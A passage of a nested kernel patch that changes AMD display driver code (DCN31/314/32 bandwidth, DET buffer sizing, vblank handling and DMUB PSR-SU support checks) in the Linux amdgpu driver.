++			if (context->res_ctx.pipe_ctx[i].stream == current_stream && isFreesyncVideo) {
++				min_dst_y_next_start_us = context->res_ctx.pipe_ctx[i].dlg_regs.min_dst_y_next_start_us;
++				break;
+ 			}
+ 		}
+ 
+@@ -993,7 +992,7 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+ 		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 8e416433184cf..19d034341e640 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -483,7 +483,7 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 		int pipe_cnt,
+ 		int vlevel)
+ {
+-	int i, pipe_idx, active_dpp_count = 0;
++	int i, pipe_idx, total_det = 0, active_hubp_count = 0;
+ 	double dcfclk = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
+ 
+ 	dc_assert_fp_enabled();
+@@ -529,7 +529,7 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 			continue;
+ 
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+-			active_dpp_count++;
++			active_hubp_count++;
+ 
+ 		pipes[pipe_idx].clks_cfg.dispclk_mhz = get_dispclk_calculated(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 		pipes[pipe_idx].clks_cfg.dppclk_mhz = get_dppclk_calculated(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
+@@ -547,9 +547,34 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 	}
+ 
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+-	/* For 31x apu pstate change is only supported if possible in vactive or if there are no active dpps */
++	/* For 31x apu pstate change is only supported if possible in vactive*/
+ 	context->bw_ctx.bw.dcn.clk.p_state_change_support =
+-			context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] == dm_dram_clock_change_vactive || !active_dpp_count;
++			context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] == dm_dram_clock_change_vactive;
++	/* If DCN isn't making memory requests we can allow pstate change and lower clocks */
++	if (!active_hubp_count) {
++		context->bw_ctx.bw.dcn.clk.socclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dppclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_deep_sleep_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dramclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.fclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.p_state_change_support = true;
++		for (i = 0; i < dc->res_pool->pipe_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = 0;
++	}
++	for (i = 0, pipe_idx = 0; i < dc->res_pool->pipe_count; i++) {
++		if (!context->res_ctx.pipe_ctx[i].stream)
++			continue;
++
++		context->res_ctx.pipe_ctx[i].det_buffer_size_kb =
++				get_det_buffer_size_kbytes(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
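++		/* A value above the 384KB per-pipe maximum spans a split pair; halve it for the per-pipe size */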
++		if (context->res_ctx.pipe_ctx[i].det_buffer_size_kb > 384)
++			context->res_ctx.pipe_ctx[i].det_buffer_size_kb /= 2;
++		total_det += context->res_ctx.pipe_ctx[i].det_buffer_size_kb;
++		pipe_idx++;
++	}
++	context->bw_ctx.bw.dcn.compbuf_size_kb = context->bw_ctx.dml.ip.config_return_buffer_size_in_kbytes - total_det;
+ }
+ 
+ void dcn31_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params)
+@@ -797,3 +822,19 @@ void dcn316_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_param
+ 	else
+ 		dml_init_instance(&dc->dml, &dcn3_16_soc, &dcn3_16_ip, DML_PROJECT_DCN31_FPGA);
+ }
++
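++/* Highest pixel rate a single pipe can drive without ODM, derated for downspread */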
++int dcn_get_max_non_odm_pix_rate_100hz(struct _vcs_dpi_soc_bounding_box_st *soc)
++{
++	return soc->clock_limits[0].dispclk_mhz * 10000.0 / (1.0 + soc->dcn_downspread_percent / 100.0);
++}
++
++int dcn_get_approx_det_segs_required_for_pstate(
++		struct _vcs_dpi_soc_bounding_box_st *soc,
++		int pix_clk_100hz, int bpp, int seg_size_kb)
++{
++	/* Roughly calculate required crb to hide latency. In practice there is slightly
++	 * more buffer available for latency hiding
++	 */
++	return (int)(soc->dram_clock_change_latency_us * pix_clk_100hz * bpp
++					/ 10240000 + seg_size_kb - 1) /	seg_size_kb;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
+index fd58b2561ec9e..99518f64d83dd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
+@@ -46,5 +46,9 @@ void dcn31_calculate_wm_and_dlg_fp(
+ void dcn31_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
+ void dcn315_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
+ void dcn316_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
++int dcn_get_max_non_odm_pix_rate_100hz(struct _vcs_dpi_soc_bounding_box_st *soc);
++int dcn_get_approx_det_segs_required_for_pstate(
++		struct _vcs_dpi_soc_bounding_box_st *soc,
++		int pix_clk_100hz, int bpp, int seg_size_kb);
+ 
+ #endif /* __DCN31_FPU_H__*/
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index cf8f3d690fa66..ebc04b72b284b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -533,7 +533,8 @@ static void CalculateStutterEfficiency(
+ static void CalculateSwathAndDETConfiguration(
+ 		bool ForceSingleDPP,
+ 		int NumberOfActivePlanes,
+-		unsigned int DETBufferSizeInKByte,
++		bool DETSharedByAllDPP,
++		unsigned int DETBufferSizeInKByte[],
+ 		double MaximumSwathWidthLuma[],
+ 		double MaximumSwathWidthChroma[],
+ 		enum scan_direction_class SourceScan[],
+@@ -3116,7 +3117,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 				v->SurfaceWidthC[k],
+ 				v->SurfaceHeightY[k],
+ 				v->SurfaceHeightC[k],
+-				v->DETBufferSizeInKByte[0] * 1024,
++				v->DETBufferSizeInKByte[k] * 1024,
+ 				v->BlockHeight256BytesY[k],
+ 				v->BlockHeight256BytesC[k],
+ 				v->SurfaceTiling[k],
+@@ -3311,7 +3312,8 @@ static void DisplayPipeConfiguration(struct display_mode_lib *mode_lib)
+ 	CalculateSwathAndDETConfiguration(
+ 			false,
+ 			v->NumberOfActivePlanes,
+-			v->DETBufferSizeInKByte[0],
++			mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++			v->DETBufferSizeInKByte,
+ 			dummy1,
+ 			dummy2,
+ 			v->SourceScan,
+@@ -3777,14 +3779,16 @@ static noinline void CalculatePrefetchSchedulePerPlane(
+ 		&v->VReadyOffsetPix[k]);
+ }
+ 
+-static void PatchDETBufferSizeInKByte(unsigned int NumberOfActivePlanes, int NoOfDPPThisState[], unsigned int config_return_buffer_size_in_kbytes, unsigned int *DETBufferSizeInKByte)
++static void PatchDETBufferSizeInKByte(unsigned int NumberOfActivePlanes, int NoOfDPPThisState[], unsigned int config_return_buffer_size_in_kbytes, unsigned int DETBufferSizeInKByte[])
+ {
+ 	int i, total_pipes = 0;
+ 	for (i = 0; i < NumberOfActivePlanes; i++)
+ 		total_pipes += NoOfDPPThisState[i];
+-	*DETBufferSizeInKByte = ((config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB) / 64 / total_pipes) * 64;
+-	if (*DETBufferSizeInKByte > DCN3_15_MAX_DET_SIZE)
+-		*DETBufferSizeInKByte = DCN3_15_MAX_DET_SIZE;
++	DETBufferSizeInKByte[0] = ((config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB) / 64 / total_pipes) * 64;
++	if (DETBufferSizeInKByte[0] > DCN3_15_MAX_DET_SIZE)
++		DETBufferSizeInKByte[0] = DCN3_15_MAX_DET_SIZE;
++	for (i = 1; i < NumberOfActivePlanes; i++)
++		DETBufferSizeInKByte[i] = DETBufferSizeInKByte[0];
+ }
+ 
+ 
+@@ -4024,7 +4028,8 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 	CalculateSwathAndDETConfiguration(
+ 			true,
+ 			v->NumberOfActivePlanes,
+-			v->DETBufferSizeInKByte[0],
++			mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++			v->DETBufferSizeInKByte,
+ 			v->MaximumSwathWidthLuma,
+ 			v->MaximumSwathWidthChroma,
+ 			v->SourceScan,
+@@ -4164,6 +4169,10 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 						|| (v->PlaneRequiredDISPCLK > v->MaxDispclkRoundedDownToDFSGranularity)) {
+ 					v->DISPCLK_DPPCLK_Support[i][j] = false;
+ 				}
++				if (mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[k] > DCN3_15_MAX_DET_SIZE && v->NoOfDPP[i][j][k] < 2) {
++					v->MPCCombine[i][j][k] = true;
++					v->NoOfDPP[i][j][k] = 2;
++				}
+ 			}
+ 			v->TotalNumberOfActiveDPP[i][j] = 0;
+ 			v->TotalNumberOfSingleDPPPlanes[i][j] = 0;
+@@ -4640,12 +4649,13 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				v->ODMCombineEnableThisState[k] = v->ODMCombineEnablePerState[i][k];
+ 			}
+ 
+-			if (v->NumberOfActivePlanes > 1 && mode_lib->project == DML_PROJECT_DCN315)
+-				PatchDETBufferSizeInKByte(v->NumberOfActivePlanes, v->NoOfDPPThisState, v->ip.config_return_buffer_size_in_kbytes, &v->DETBufferSizeInKByte[0]);
++			if (v->NumberOfActivePlanes > 1 && mode_lib->project == DML_PROJECT_DCN315 && !v->DETSizeOverride[0])
++				PatchDETBufferSizeInKByte(v->NumberOfActivePlanes, v->NoOfDPPThisState, v->ip.config_return_buffer_size_in_kbytes, v->DETBufferSizeInKByte);
+ 			CalculateSwathAndDETConfiguration(
+ 					false,
+ 					v->NumberOfActivePlanes,
+-					v->DETBufferSizeInKByte[0],
++					mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++					v->DETBufferSizeInKByte,
+ 					v->MaximumSwathWidthLuma,
+ 					v->MaximumSwathWidthChroma,
+ 					v->SourceScan,
+@@ -6557,7 +6567,8 @@ static void CalculateStutterEfficiency(
+ static void CalculateSwathAndDETConfiguration(
+ 		bool ForceSingleDPP,
+ 		int NumberOfActivePlanes,
+-		unsigned int DETBufferSizeInKByte,
++		bool DETSharedByAllDPP,
++		unsigned int DETBufferSizeInKByteA[],
+ 		double MaximumSwathWidthLuma[],
+ 		double MaximumSwathWidthChroma[],
+ 		enum scan_direction_class SourceScan[],
+@@ -6641,6 +6652,10 @@ static void CalculateSwathAndDETConfiguration(
+ 
+ 	*ViewportSizeSupport = true;
+ 	for (k = 0; k < NumberOfActivePlanes; ++k) {
++		unsigned int DETBufferSizeInKByte = DETBufferSizeInKByteA[k];
++
++		if (DETSharedByAllDPP && DPPPerPlane[k])
++			DETBufferSizeInKByte /= DPPPerPlane[k];
+ 		if ((SourcePixelFormat[k] == dm_444_64 || SourcePixelFormat[k] == dm_444_32 || SourcePixelFormat[k] == dm_444_16 || SourcePixelFormat[k] == dm_mono_16
+ 				|| SourcePixelFormat[k] == dm_mono_8 || SourcePixelFormat[k] == dm_rgbe)) {
+ 			if (SurfaceTiling[k] == dm_sw_linear
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
+index 35d10b4d018bf..d7ee26b62a5eb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
+@@ -988,8 +988,7 @@ static void dml_rq_dlg_get_dlg_params(
+ 
+ 	dlg_vblank_start = interlaced ? (vblank_start / 2) : vblank_start;
+ 	disp_dlg_regs->min_dst_y_next_start = (unsigned int) (((double) dlg_vblank_start) * dml_pow(2, 2));
+-	disp_dlg_regs->optimized_min_dst_y_next_start_us = 0;
+-	disp_dlg_regs->optimized_min_dst_y_next_start = disp_dlg_regs->min_dst_y_next_start;
++	disp_dlg_regs->min_dst_y_next_start_us = 0;
+ 	ASSERT(disp_dlg_regs->min_dst_y_next_start < (unsigned int)dml_pow(2, 18));
+ 
+ 	dml_print("DML_DLG: %s: min_ttu_vblank (us)         = %3.2f\n", __func__, min_ttu_vblank);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index bf77e56c3f3ef..8a88605827a84 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -32,7 +32,7 @@
+ #include "dml/display_mode_vba.h"
+ 
+ struct _vcs_dpi_ip_params_st dcn3_14_ip = {
+-	.VBlankNomDefaultUS = 668,
++	.VBlankNomDefaultUS = 800,
+ 	.gpuvm_enable = 1,
+ 	.gpuvm_max_page_table_levels = 1,
+ 	.hostvm_enable = 1,
+@@ -288,6 +288,7 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 	struct resource_context *res_ctx = &context->res_ctx;
+ 	struct pipe_ctx *pipe;
+ 	bool upscaled = false;
++	const unsigned int max_allowed_vblank_nom = 1023;
+ 
+ 	dc_assert_fp_enabled();
+ 
+@@ -301,9 +302,15 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 		pipe = &res_ctx->pipe_ctx[i];
+ 		timing = &pipe->stream->timing;
+ 
+-		if (dc_extended_blank_supported(dc) && pipe->stream->adjust.v_total_max == pipe->stream->adjust.v_total_min
+-			&& pipe->stream->adjust.v_total_min > timing->v_total)
++		if (pipe->stream->adjust.v_total_min != 0)
+ 			pipes[pipe_cnt].pipe.dest.vtotal = pipe->stream->adjust.v_total_min;
++		else
++			pipes[pipe_cnt].pipe.dest.vtotal = timing->v_total;
++
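++		/* Derive the nominal vblank and clamp it between v_sync_width and the 1023-line limit */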
++		pipes[pipe_cnt].pipe.dest.vblank_nom = timing->v_total - pipes[pipe_cnt].pipe.dest.vactive;
++		pipes[pipe_cnt].pipe.dest.vblank_nom = min(pipes[pipe_cnt].pipe.dest.vblank_nom, dcn3_14_ip.VBlankNomDefaultUS);
++		pipes[pipe_cnt].pipe.dest.vblank_nom = max(pipes[pipe_cnt].pipe.dest.vblank_nom, timing->v_sync_width);
++		pipes[pipe_cnt].pipe.dest.vblank_nom = min(pipes[pipe_cnt].pipe.dest.vblank_nom, max_allowed_vblank_nom);
+ 
+ 		if (pipe->plane_state &&
+ 				(pipe->plane_state->src_rect.height < pipe->plane_state->dst_rect.height ||
+@@ -327,8 +334,6 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ 		pipes[pipe_cnt].pipe.dest.vfront_porch = timing->v_front_porch;
+-		pipes[pipe_cnt].pipe.dest.vblank_nom =
+-				dcn3_14_ip.VBlankNomDefaultUS / (timing->h_total / (timing->pix_clk_100hz / 10000.0));
+ 		pipes[pipe_cnt].pipe.src.dcc_rate = 3;
+ 		pipes[pipe_cnt].dout.dsc_input_bpc = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
+index 61ee9ba063a78..26561c0f5fbb6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
+@@ -1053,7 +1053,6 @@ static void dml_rq_dlg_get_dlg_params(
+ 
+ 	float vba__refcyc_per_req_delivery_pre_l = get_refcyc_per_req_delivery_pre_l_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx) * refclk_freq_in_mhz;  // From VBA
+ 	float vba__refcyc_per_req_delivery_l = get_refcyc_per_req_delivery_l_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx) * refclk_freq_in_mhz;  // From VBA
+-	int blank_lines = 0;
+ 
+ 	memset(disp_dlg_regs, 0, sizeof(*disp_dlg_regs));
+ 	memset(disp_ttu_regs, 0, sizeof(*disp_ttu_regs));
+@@ -1077,17 +1076,10 @@ static void dml_rq_dlg_get_dlg_params(
+ 	min_ttu_vblank = get_min_ttu_vblank_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx);	// From VBA
+ 
+ 	dlg_vblank_start = interlaced ? (vblank_start / 2) : vblank_start;
+-	disp_dlg_regs->optimized_min_dst_y_next_start = disp_dlg_regs->min_dst_y_next_start;
+-	disp_dlg_regs->optimized_min_dst_y_next_start_us = 0;
+-	disp_dlg_regs->min_dst_y_next_start = (unsigned int) (((double) dlg_vblank_start) * dml_pow(2, 2));
+-	blank_lines = (dst->vblank_end + dst->vtotal_min - dst->vblank_start - dst->vstartup_start - 1);
+-	if (blank_lines < 0)
+-		blank_lines = 0;
+-	if (blank_lines != 0) {
+-		disp_dlg_regs->optimized_min_dst_y_next_start = vba__min_dst_y_next_start;
+-		disp_dlg_regs->optimized_min_dst_y_next_start_us = (disp_dlg_regs->optimized_min_dst_y_next_start * dst->hactive) / (unsigned int) dst->pixel_rate_mhz;
+-		disp_dlg_regs->min_dst_y_next_start = disp_dlg_regs->optimized_min_dst_y_next_start;
+-	}
++	disp_dlg_regs->min_dst_y_next_start_us =
++		(vba__min_dst_y_next_start * dst->hactive) / (unsigned int) dst->pixel_rate_mhz;
++	disp_dlg_regs->min_dst_y_next_start = vba__min_dst_y_next_start * dml_pow(2, 2);
++
+ 	ASSERT(disp_dlg_regs->min_dst_y_next_start < (unsigned int)dml_pow(2, 18));
+ 
+ 	dml_print("DML_DLG: %s: min_ttu_vblank (us)         = %3.2f\n", __func__, min_ttu_vblank);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index f28caece5f901..c89b761bcb926 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1237,7 +1237,7 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 				       display_e2e_pipe_params_st *pipes,
+ 				       int pipe_cnt, int vlevel)
+ {
+-	int i, pipe_idx;
++	int i, pipe_idx, active_hubp_count = 0;
+ 	bool usr_retraining_support = false;
+ 	bool unbounded_req_enabled = false;
+ 
+@@ -1282,6 +1282,8 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 	for (i = 0, pipe_idx = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (!context->res_ctx.pipe_ctx[i].stream)
+ 			continue;
++		if (context->res_ctx.pipe_ctx[i].plane_state)
++			active_hubp_count++;
+ 		pipes[pipe_idx].pipe.dest.vstartup_start = get_vstartup(&context->bw_ctx.dml, pipes, pipe_cnt,
+ 				pipe_idx);
+ 		pipes[pipe_idx].pipe.dest.vupdate_offset = get_vupdate_offset(&context->bw_ctx.dml, pipes, pipe_cnt,
+@@ -1303,10 +1305,23 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 
+ 		if (context->bw_ctx.bw.dcn.clk.dppclk_khz < pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000)
+ 			context->bw_ctx.bw.dcn.clk.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
+-		context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
++		if (context->res_ctx.pipe_ctx[i].plane_state)
++			context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
++		else
++			context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = 0;
+ 		context->res_ctx.pipe_ctx[i].pipe_dlg_param = pipes[pipe_idx].pipe.dest;
+ 		pipe_idx++;
+ 	}
++	/* If DCN isn't making memory requests we can allow pstate change and lower clocks */
++	if (!active_hubp_count) {
++		context->bw_ctx.bw.dcn.clk.socclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dppclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_deep_sleep_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dramclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.fclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.p_state_change_support = true;
++	}
+ 	/*save a original dppclock copy*/
+ 	context->bw_ctx.bw.dcn.clk.bw_dppclk_khz = context->bw_ctx.bw.dcn.clk.dppclk_khz;
+ 	context->bw_ctx.bw.dcn.clk.bw_dispclk_khz = context->bw_ctx.bw.dcn.clk.dispclk_khz;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
+index 64d602e6412f1..6af0d5f469aeb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
+@@ -618,8 +618,7 @@ struct _vcs_dpi_display_dlg_regs_st {
+ 	unsigned int refcyc_h_blank_end;
+ 	unsigned int dlg_vblank_end;
+ 	unsigned int min_dst_y_next_start;
+-	unsigned int optimized_min_dst_y_next_start;
+-	unsigned int optimized_min_dst_y_next_start_us;
++	unsigned int min_dst_y_next_start_us;
+ 	unsigned int refcyc_per_htotal;
+ 	unsigned int refcyc_x_after_scaler;
+ 	unsigned int dst_y_after_scaler;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+index 8e6585dab20ef..1070cf8701960 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+@@ -569,6 +569,10 @@ static void fetch_pipe_params(struct display_mode_lib *mode_lib)
+ 		mode_lib->vba.OutputLinkDPRate[mode_lib->vba.NumberOfActivePlanes] = dout->dp_rate;
+ 		mode_lib->vba.ODMUse[mode_lib->vba.NumberOfActivePlanes] = dst->odm_combine_policy;
+ 		mode_lib->vba.DETSizeOverride[mode_lib->vba.NumberOfActivePlanes] = src->det_size_override;
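++		/* A per-pipe DET size override takes precedence over the default IP DET allocation */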
++		if (src->det_size_override)
++			mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = src->det_size_override;
++		else
++			mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = ip->det_buffer_size_kbytes;
+ 		//TODO: Need to assign correct values to dp_multistream vars
+ 		mode_lib->vba.OutputMultistreamEn[mode_lib->vba.NumberOfActiveSurfaces] = dout->dp_multistream_en;
+ 		mode_lib->vba.OutputMultistreamId[mode_lib->vba.NumberOfActiveSurfaces] = dout->dp_multistream_id;
+@@ -783,6 +787,8 @@ static void fetch_pipe_params(struct display_mode_lib *mode_lib)
+ 					mode_lib->vba.pipe_plane[k] =
+ 							mode_lib->vba.NumberOfActivePlanes;
+ 					mode_lib->vba.DPPPerPlane[mode_lib->vba.NumberOfActivePlanes]++;
++					if (src_k->det_size_override)
++						mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = src_k->det_size_override;
+ 					if (mode_lib->vba.SourceScan[mode_lib->vba.NumberOfActivePlanes]
+ 							== dm_horz) {
+ 						mode_lib->vba.ViewportWidth[mode_lib->vba.NumberOfActivePlanes] +=
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index b53468aca4a9b..5f17b252e9be4 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -350,6 +350,8 @@ struct dmub_srv_hw_funcs {
+ 
+ 	bool (*is_supported)(struct dmub_srv *dmub);
+ 
++	bool (*is_psrsu_supported)(struct dmub_srv *dmub);
++
+ 	bool (*is_hw_init)(struct dmub_srv *dmub);
+ 
+ 	bool (*is_phy_init)(struct dmub_srv *dmub);
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 27a4ea7dc74ec..d8c05bc45957b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -345,7 +345,7 @@ union dmub_fw_boot_status {
+ 		uint32_t optimized_init_done : 1; /**< 1 if optimized init done */
+ 		uint32_t restore_required : 1; /**< 1 if driver should call restore */
+ 		uint32_t defer_load : 1; /**< 1 if VBIOS data is deferred programmed */
+-		uint32_t reserved : 1;
++	uint32_t fams_enabled : 1; /**< 1 if FAMS is enabled */
+ 		uint32_t detection_required: 1; /**<  if detection need to be triggered by driver */
+ 
+ 	} bits; /**< status bits */
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/Makefile b/drivers/gpu/drm/amd/display/dmub/src/Makefile
+index 0589ad4778eea..caf095aca8f3f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/Makefile
++++ b/drivers/gpu/drm/amd/display/dmub/src/Makefile
+@@ -22,7 +22,7 @@
+ 
+ DMUB = dmub_srv.o dmub_srv_stat.o dmub_reg.o dmub_dcn20.o dmub_dcn21.o
+ DMUB += dmub_dcn30.o dmub_dcn301.o dmub_dcn302.o dmub_dcn303.o
+-DMUB += dmub_dcn31.o dmub_dcn315.o dmub_dcn316.o
++DMUB += dmub_dcn31.o dmub_dcn314.o dmub_dcn315.o dmub_dcn316.o
+ DMUB += dmub_dcn32.o
+ 
+ AMD_DAL_DMUB = $(addprefix $(AMDDALPATH)/dmub/src/,$(DMUB))
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+index c90b9ee42e126..89d24fb7024e2 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+@@ -297,6 +297,11 @@ bool dmub_dcn31_is_supported(struct dmub_srv *dmub)
+ 	return supported;
+ }
+ 
++bool dmub_dcn31_is_psrsu_supported(struct dmub_srv *dmub)
++{
++	return dmub->fw_version >= DMUB_FW_VERSION(4, 0, 59);
++}
++
+ void dmub_dcn31_set_gpint(struct dmub_srv *dmub,
+ 			  union dmub_gpint_data_register reg)
+ {
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+index f6db6f89d45dc..eb62410941473 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+@@ -219,6 +219,8 @@ bool dmub_dcn31_is_hw_init(struct dmub_srv *dmub);
+ 
+ bool dmub_dcn31_is_supported(struct dmub_srv *dmub);
+ 
++bool dmub_dcn31_is_psrsu_supported(struct dmub_srv *dmub);
++
